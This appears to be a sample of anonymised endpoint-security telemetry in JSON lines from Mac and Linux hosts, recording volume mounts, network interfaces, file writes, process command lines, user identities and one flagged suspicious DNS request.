-{"VolumeMediaName":"AppleAPFSMedia","VolumeDeviceProtocol":"PCI-Express","VolumeDeviceVendor":"","ContextThreadId":"0","VolumeMediaContent":"41504653-0000-11AA-AA11-00306543ECAC","VolumeMediaEjectable":"0","aip":"208.93.153.49","VolumeAppearanceTime":"1625677422.647","VolumeDeviceModel":"APPLE SSD SM0256L","VolumeMediaBSDName":"disk1s3","VolumeMountPoint":"/Volumes/Recovery","event_platform":"Mac","VolumeType":"APFS","VolumeMediaRemovable":"0","VolumeMediaBSDUnit":"1","VolumeFileSystemDriver":"apfs","id":"ffffffff-1111-11eb-956a-02748d01bd3d","VolumeMediaSize":"250685575168","EffectiveTransmissionClass":"2","VolumeBusName":"IONVMeController","timestamp":"1625677496804","VolumeMediaBSDMinor":"8","VolumeMediaWritable":"1","event_simpleName":"FsVolumeMounted","VolumeDevicePath":"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1","VolumeName":"Recovery","ContextTimeStamp":"1625677496.750","VolumeSectorSize":"4096","ConfigStateHash":"3090255842","ContextProcessId":"365053546767850587","VolumeBusPath":"IODeviceTree:/PCI0@0/RP01@1C/SSD0@0/IONVMeController","VolumeDeviceInternal":"1","ConfigBuild":"1007.4.0013701.1","VolumeUUID":"85400FAD-01F9-0442-8C5D-441F365D4909","VolumeDeviceRevision":"CXS4LA0Q","Entitlements":"15","name":"FsVolumeMountedMacV1","VolumeMediaBSDMaj
or":"1","VolumeMediaPath":"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1/IOBlockStorageDriver/APPLE SSD SM0256L Media/IOGUIDPartitionScheme/NoName@2/AppleAPFSContainerScheme/AppleAPFSMedia/AppleAPFSContainer/Recovery@3","aid":"ffffffff8eca418b7a861be9c5f7de1d","VolumeMediaUUID":"AD0F4085-F901-4204-8C5D-441F365D4909","VolumeMediaWhole":"0","cid":"ffffffff15754bcfb5f9152ec7ac90ac","VolumeIsNetwork":"0"}
-{"LocalAddressIP4":"208.30.117.28","event_simpleName":"LocalIpAddressIP4","ConfigStateHash":"1156120155","CreationTimeStamp":"1625677513.841","aip":"208.233.54.217","PhysicalAddress":"0e-d6-ff-ff-ff-63","InterfaceAlias":"eth0","InterfaceIndex":"2","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","InterfaceType":"1","name":"LocalIpAddressIP4LinV1","id":"ffffffff-1111-11eb-9c94-0222a21bbb27","PhysicalAddressLength":"6","aid":"ffffffff190e436aaebc3892bcda5beb","timestamp":"1625677514374","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"LocalIpAddressRemovedIP6","LocalAddressIP6":"ff88:1:1:ffff:442a:7bff:fe75:9ed","ConfigStateHash":"3967242894","aip":"208.165.30.176","InterfaceIndex":"8","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","NetLuidIndex":"0","Entitlements":"15","name":"LocalIpAddressRemovedIP6MacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677480056","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"OutOctets":"0","CreationTimeStamp":"","aip":"208.176.144.39","OutMulticastPkts":"0","InErrors":"0","InterfaceAlias":"llw0","InDiscards":"0","InterfaceIndex":"8","event_platform":"Mac","InterfaceType":"6","id":"ffffffff-1111-11eb-b88d-06b7cb0d7bd7","PhysicalAddressLength":"6","InUcastPkts":"0","EffectiveTransmissionClass":"2","timestamp":"1625677521723","event_simpleName":"LocalIpAddressIP6","LocalAddressIP6":"ff88:1:1:ffff:c027:b0ff:fe27:830f","ConfigStateHash":"1620585913","PhysicalAddress":"c2-27-b0-27-83-0f","OutErrors":"0","InUnknownProtos":"0","OutUcastPkts":"0","InMulticastPkts":"0","ConfigBuild":"1007.4.0013701.1","InOctets":"0","NetLuidIndex":"0","Entitlements":"15","name":"LocalIpAddressIP6MacV1","aid":"ffffffff0ad7494e8e817b3903f4eebb","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkListenIP4","ContextTimeStamp":"1625677507.037","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"364432308748445743","RemotePort":"0","aip":"208.98.120.25","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"50647","Entitlements":"15","name":"NetworkListenIP4MacV10","id":"ffffffff-1111-11eb-8b36-06a8af5164a9","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff23d24c4193ffa6f270775ee5","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677507086","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"ExecutableDeleted","ContextTimeStamp":"1625677536.729","ConfigStateHash":"3090255842","ContextProcessId":"364994904864288322","ContextThreadId":"0","aip":"208.31.216.39","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ExecutableDeletedMacV1","id":"ffffffff-1111-11eb-8ca0-0231588e8cbb","EffectiveTransmissionClass":"2","aid":"ffffffffa7bf46da689501ce58bd6987","timestamp":"1625677536784","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user3/Library/Caches/com.tinyspeck.slackmacgap.ShipIt/update.FXKsmFO/Slack.app/Contents/Frameworks/Squirrel.framework/Versions/A/Resources/ShipIt"}
-{"event_simpleName":"GzipFileWritten","ContextTimeStamp":"1625677504.542","ConfigStateHash":"3090255842","ContextProcessId":"362897421906895953","ContextThreadId":"0","aip":"208.188.8.87","FileIdentifier":"04000001000000000000000000000000501f510700000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"GzipFileWrittenMacV1","id":"ffffffff-1111-11eb-9320-06d410e6f705","EffectiveTransmissionClass":"2","aid":"fffffffffc2c4e4fa9c08e1a8388e5f9","timestamp":"1625677504614","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/powerlog/Library/BatteryLife/Archives/powerlog_2021-07-05_CC5F9FC1.PLSQL.gz"}
-{"event_simpleName":"IOServiceRegister","ContextTimeStamp":"1625622770.595","ConfigStateHash":"3967242894","aip":"208.165.30.176","IOServiceClass":"IOUSBDevice:IOUSBNub:IOService:IORegistryEntry:OSObject","ConfigBuild":"1007.4.0013701.1","IOServicePath":"IOService:/IOResources/AppleUSBHostResources/AppleUSBLegacyRoot/AppleUSBVHCIBCE@80000000/Touch Bar Backlight@80700000","event_platform":"Mac","IOServiceProperties":"","Entitlements":"15","name":"IOServiceRegisterMacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","IOServiceName":"Touch Bar
Backlight","timestamp":"1625677480056","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"PtyCreated","ContextTimeStamp":"1625622602.031","ConfigStateHash":"3967242894","ContextProcessId":"364938416497226937","DeviceId":"251658248","ContextThreadId":"0","aip":"208.165.30.176","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"PtyCreatedMacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677478739","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"LocalAddressIP4":"208.27.233.142","event_simpleName":"LocalIpAddressRemovedIP4","ConfigStateHash":"1803419442","aip":"208.69.76.234","InterfaceIndex":"18","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","NetLuidIndex":"2","Entitlements":"15","name":"LocalIpAddressRemovedIP4MacV1","id":"ffffffff-1111-11eb-b7b7-066cc89bcebf","EffectiveTransmissionClass":"2","aid":"ffffffff5ae3449ab33a1809fe6c5ce2","timestamp":"1625677475967","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"NetworkCloseIP6","ContextTimeStamp":"1625677474.875","LocalAddressIP6":"0:0:0:0:0:0:0:1","RemoteAddressIP6":"0:0:0:0:0:0:0:1","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"12241681491990","RemotePort":"9","aip":"208.144.51.215","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"59999","Entitlements":"15","name":"NetworkCloseIP6LinV6","id":"ffffffff-1111-11eb-8130-02cde7751097","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff335f47ca89cad6a19f203bbd","ConnectionDirection":"2","InContext":"0","timestamp":"1625677475413","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"ConfigBuild":"1007.8.0011611.1","event_simpleName":"ConfigStateUpdate","event_platform":"Lin","ConfigStateHash":"1156120155","ConfigStateData":"0,0,1007.8.0011611.1|1,c,0|1,22,6|1,59,2d|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|","name":"ConfigStateUpdateLinV2","aip":"208.203.151.21","id":"ffffffff-1111-11eb-af89-06c111484f9f","aid":"ffffffffa74a4c89b9984a3a7124bb9d","timestamp":"1625677490580","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"SuspiciousDnsRequest","ContextTimeStamp":"1625677493.531","ConfigStateHash":"3090255842","ContextProcessId":"364839648316192383","DomainName":"hg-t2.dotice.me","ContextThreadId":"0","aip":"208.141.219.156","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"SuspiciousDnsRequestMacV1","id":"ffffffff-1111-11eb-a4a3-02cbdfb8f529","EffectiveTransmissionClass":"2","aid":"ffffffff0cd64fb78626ab1b6c65ac8c","timestamp":"1625677493756","cid":"ffffffff15754bcfb5f9152ec7ac90ac","RequestType":"1"}
-{"Parameter2":"0","event_simpleName":"ErrorEvent","Parameter1":"18446744072635810412","Parameter3":"0","ConfigStateHash":"1156120155","aip":"208.233.54.217","Line":"96","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","ErrorStatus":"3759276032","name":"ErrorEventLinV1","id":"ffffffff-1111-11eb-bdd3-0681aa29cecb","Facility":"16778240","aid":"ffffffffabd047b1a86c1fcd8ef22b59","File":"0","timestamp":"1625677530922","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"ConfigStateUpdate","ConfigStateHash":"3090255842","ConfigStateData":"0,0,1007.4.0013701.1|1,2,1|1,4,a|1,6,0|1,8,46|1,a,1|1,c,0|1,17,1f|1,18,18|1,19,0|1,1e,407|1,21,3d2|1,27,1|1,53,18b|1,56,0|1,d0,16d|1,d1,0|1,d2,0|1,df,4c|1,e0,6|1,f6,1|1,1f5,1|1,1f7,1|1,1fd,1|1,200,0|2,0,138,a8000000032,140000000085,140000000153,18000000004c,18000000004f,180000000050,180000000051,180000000054,1800000000e1,1800000000e7,180000000144,18000000014e,18000000015a,18000000020e,180000000226,180000000227,180400000079,18040000009b,18040000009c,1804000000ff,180400000117,180400000118,180400000142,180400000163,180400000164,180400000166,180400000167,1804000001b2,1804000001f2,1804000001f3,180400000225,1804000002be,1804000002bf,1804000002ca,1804000002cb,1808000000c9,1808000000ee,1808000000fc,1808000000fd,1808000000fe,180c0000016b,180c0000016c,180c0000016d,180c0000016e,180c0000016f,180c00000170,180c000001b6,180c000001b7,180c000001b8,180c000001b9,180c000001f6,180c000001f7,180c000001f8,180c000002c2,180c000002c3,180c000002c4,180c000002ce,180c000002cf,180c000002d0,18100000011e,18100000011f,181000000120,181000000121,181000000122,181000000123,181000000124,181000000125,181000000126,181000000128,181000000169,18100000016a,181000000180,1810000001b1,1810000001c3,18100000021f,181000000220,18100000024e,18100000025b,181000000280,1810000002ad,1810000002d6,1810000002d7,1810000002f3,1c04000000a1,1c04000000a2,1c04000000a3,1c04000000a4,1c04000000a5,1c04000000a6,1c040000011a,1c040000011b,1c040000011c,1c0400000268,1c0400000269,1c040000026a,1c040000026c,1c040000026d,1c040000026e,1c0400000271,1c0400000272,1c0400000273,1c0400000275,1c0400000276,1c0400000277,1c040000028f,1c0400000290,1c0400000291,1c0400000293,1c0400000294,1c0400000295,1c0400000297,1c0400000298,1c0400000299,1c040000029b,1c040000029c,1c040000029d,1c040000029f,1c04000002a0|3,0,65|","aip":"208.24.60.146","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ConfigStateUpdateMacV2","id":"ffffffff-1111-11eb-8dc4-
0234c12f9875","EffectiveTransmissionClass":"0","aid":"ffffffffa15a452190ae454f7d33e07e","timestamp":"1625677530590","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"KextLoad","ContextTimeStamp":"1625677509.064","ConfigStateHash":"1620585913","ContextProcessId":"364867547408058681","ContextThreadId":"0","aip":"208.131.106.21","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","BundleID":"com.apple.driver.AudioAUUC","Entitlements":"15","name":"KextLoadMacV1","id":"ffffffff-1111-11eb-a2ae-028f6bf89be7","EffectiveTransmissionClass":"2","aid":"ffffffffaa0e47a1b009aef151d6179d","timestamp":"1625677509069","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"ChannelVersion":"25","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"3155796140","aip":"208.27.17.203","ChannelVersionRequired":"0","ChannelId":"20","ConfigBuild":"1007.8.0011110.1","event_platform":"Lin","name":"ChannelVersionRequiredLinV1","id":"ffffffff-1111-11eb-b411-06baeacb7a63","aid":"ffffffff67d54f7daf3d998ffc74d48e","timestamp":"1625677507901","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"ProcessRollup2Stats","ConfigStateHash":"2037712541","Timeout":"60","ParentProcessId":"0","aip":"208.203.151.21","SuppressType":"3","SHA256HashData":"64e48365207d0c19008ba7d53d75c0de3fcd5a1590e4c40fc69c677663fedc20","ProcessCount":"60","BoundedCount":"57","ConfigBuild":"1007.8.0011308.1","UID":"115","event_platform":"Lin","CommandLine":"sh -c \"/usr/lib/erlang/erts-11.1.3/bin/epmd\" -daemon","Entitlements":"15","name":"ProcessRollup2StatsLinV3","id":"ffffffff-1111-11eb-b34e-063f4cefccb3","EffectiveTransmissionClass":"2","aid":"ffffffffe22549479fbe8293b6747a68","timestamp":"1625677511754","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"UserIdentity","LoginSessionId":"1138166333440","AuthenticationUuidAsString":"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109","UserName":"user1","ConfigStateHash":"3967242894","aip":"208.165.30.176","AuthenticationId":"265","UserPrincipal":"user1@dom1","UserSid":"S-1-5-21-3852557355-3178143607-2040168074-1530","ConfigBuild":"1007.4.0013701.1","UID":"265","event_platform":"Mac","Entitlements":"15","name":"UserIdentityMacV4","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","AuthenticationUuid":"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109","timestamp":"1625677478122","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"FeatureVector":"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","event_simpleName":"DeliverLocalFXToCloud","ConfigStateHash":"1620585913","aip":"208.237.139.168","ModelPrediction":"1436899696705536","SHA256HashData":"c89caf538788e6524bf4ae93194051f3389eecbc71e4793f12a2dc0368211cc2","Malicious":"0","ConfigBuild":"1007.4.0013701.1","FeatureExtractionVersion":"2","event_platform":"Mac","FXFileSize":"502032","Entitlements":"15","name":"DeliverLocalFXToCloudMacV4","PupAdwareDecisionValue":"12384657383358464","id":"ffffffff-1111-11eb-b44e-069a02b0ad6b","PupAdwareConfidence":"0","EffectiveTransmissionClass":"1","aid":"ffffffff45d647e6ae0ba8764a4bd570","MLModelVersion":"4","timestamp":"1625677489052","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"CreateProcessArgs","ContextTimeStamp":"1625677524.929","ConfigStateHash":"3090255842","ContextProcessId":"365035560818271291","ContextThreadId":"365035560818271291","aip":"208.114.159.32","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","CommandLine":"t.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/CategorySurfaceViewController.o -o 
/Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationActionView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationAddressView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationErrorView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationHeaderView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationLoadingView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationPostalCodeView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationViewController.o -index-store-path /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Index/DataStore 
-index-system-modules","Entitlements":"15","name":"CreateProcessArgsMac","id":"ffffffff-1111-11eb-8332-020506b18db5","EffectiveTransmissionClass":"2","aid":"ffffffffb3a3442585c05abc61e290fc","timestamp":"1625677525128","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/swift-frontend"}
-{"event_simpleName":"PdfFileWritten","ContextTimeStamp":"1625677488.523","ConfigStateHash":"3090255842","ContextProcessId":"364156540965623394","ContextThreadId":"0","aip":"208.15.11.8","FileIdentifier":"05000001000000000000000000000000f1321d0000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"PdfFileWrittenMacV1","id":"ffffffff-1111-11eb-8903-022a1941b91f","EffectiveTransmissionClass":"2","aid":"ffffffffc4044541995bffd84b9df003","timestamp":"1625677488576","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/pt/s9pzbbwd07q_0fxqvfhc513r0000gp/T/com.microsoft.Excel/Content.MSO/mso6ACABA95"}
-{"event_simpleName":"GroupIdentity","GID":"242","AuthenticationUuidAsString":"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2","ConfigStateHash":"3967242894","aip":"208.165.30.176","AuthenticationId":"1119489580471877843","UserPrincipal":"user2@dom1","UserSid":"S-1-5-21-3852557355-3178143607-2040168074-1485","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"GroupIdentityMacV2","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","AuthenticationUuid":"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2","timestamp":"1625677478379","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"MachOFileWritten","ContextTimeStamp":"1625622611.845","ConfigStateHash":"3967242894","MachOSubType":"3","ContextProcessId":"364938429384226082","Size":"0","ContextThreadId":"0","aip":"208.165.30.176","SHA256HashData":"c0f50d27fe9fb31e33d1ce6577eeb4d4e17639095ad20575da018d1fcf955198","FileIdentifier":"04000001000000000000000000000000ac41270400000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"MachOFileWrittenMacV3","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677479336","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/bf/dwpvdj3d1tq00l8fgs5rd7x00000gn/T/.net.example.desktop.ev80yl"}
-{"event_simpleName":"NetworkListenIP6","ContextTimeStamp":"1625622608.014","LocalAddressIP6":"0:0:0:0:0:0:0:0","RemoteAddressIP6":"0:0:0:0:0:0:0:0","ConfigStateHash":"3967242894","ConnectionFlags":"0","ContextProcessId":"364938390018585510","RemotePort":"0","aip":"208.165.30.176","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"8770","Entitlements":"15","name":"NetworkListenIP6MacV10","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff44564c2f8d76394cb25c31ab","ConnectionDirection":"2","InContext":"0","timestamp":"1625677478929","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"CurrentSystemTags","ConfigStateHash":"3090255842","aip":"208.87.57.118","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","SystemTableIndex":"0","Entitlements":"15","name":"CurrentSystemTagsMacV1","id":"ffffffff-1111-11eb-b88d-06b7cb0d7bd7","EffectiveTransmissionClass":"0","aid":"ffffffff62714a708030d494ca0a7e60","Tags":"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 
26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584","timestamp":"1625677502693","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"event_simpleName":"NewExecutableWritten","ContextTimeStamp":"1625677533.027","ConfigStateHash":"1620585913","ContextProcessId":"362208380891022165","Size":"596224","ContextThreadId":"0","aip":"208.24.116.10","SHA256HashData":"70a06a11057efb22285a7200a53e5b6bae001fe0a98d4b23d0f6a31ad818a005","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NewExecutableWrittenMacV2","id":"ffffffff-1111-11eb-985c-02152dd35bc1","EffectiveTransmissionClass":"2","aid":"ffffffff28414c2293e35c360213e723","timestamp":"1625677533060","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.CVG7Ya/Zoom.app/Contents/MacOS/app_mode_loader","VnodeModificationType":"0"}
-{"event_simpleName":"LfoUploadDataComplete","LfoUploadFlags":"4","AttemptNumber":"0","ConfigStateHash":"3090255842","SourceFileName":"/Users/user5/.rbenv/versions/2.6.5/bin/ruby","Size":"3876424","aip":"208.137.65.223","SHA256HashData":"d7b56e2a06304ecd343985a1aaedff2eb32ee1151bba0e152aff97c778b7562a","UploadId":"8023668629276690295","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LfoUploadDataCompleteMacV3","id":"ffffffff-1111-11eb-a2ab-024aafff599f","EffectiveTransmissionClass":"2","aid":"fffffffffbea48169985c2c2bae89d1d","Tags":"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 
26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584","timestamp":"1625677428827","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"LightningLatencyInfo","LightningLatencyState":"3","ConfigStateHash":"3090255842","aip":"208.100.38.84","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LightningLatencyInfoMacV1","id":"ffffffff-1111-11eb-b44e-069a02b0ad6b","EffectiveTransmissionClass":"0","aid":"ffffffffd452449b8d1eb7d85b146650","timestamp":"1625677453146","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"NeighborListIP4","ConfigStateHash":"1620585913","NeighborList":"40-C7-29-FF-FF-FF|192.168.2.1|1|64-9A-BE-FF-FF-FF|192.168.2.10|0|F0-FF-FF-FF-A0-14|192.168.2.43|0|DE-58-FF-FF-5D-3B|192.168.2.113|0|5E-AA-FF-FF-FF-20|192.168.2.128|0|44-FF-FF-FF-03-DD|192.168.2.136|0|EE-74-EE-EE-FF-0D|192.168.2.137|0|3A-FF-FF-FF-03-26|192.168.2.144|0|DE-79-FF-FF-FF-D4|192.168.2.145|0|0E-24-FF-EE-EE-87|192.168.2.152|0|CC-D9-AC-AF-66-F8|192.168.2.153|0|","aip":"208.93.56.66","InterfaceIndex":"6","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NeighborListIP4MacV1","id":"ffffffff-1111-11eb-9dc0-06c6f5278873","EffectiveTransmissionClass":"3","aid":"ffffffff8eb649cf8d82be1e65629a0e","timestamp":"1625677450083","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"ZipFileWritten","ContextTimeStamp":"1625677454.557","ConfigStateHash":"3090255842","ContextProcessId":"365039419134863763","ContextThreadId":"0","aip":"208.70.175.112","FileIdentifier":"07000001000000000000000000000000b1445a0900000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ZipFileWrittenMacV1","id":"ffffffff-1111-11eb-ab6e-0668ec51180b","EffectiveTransmissionClass":"2","aid":"ffffffff2d984e32b702789b54f0f811","timestamp":"1625677454723","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user6/Library/Developer/CoreSimulator/Devices/BCE6B46B-E863-4151-AA9D-D71C79438C47/data/Containers/Data/Application/1249A061-F246-4338-AE56-4373E918C9B4/Library/Application Support/com.instacart.instashopper/LogCache/2021-07-06T23:44:46.133Z.zip"}
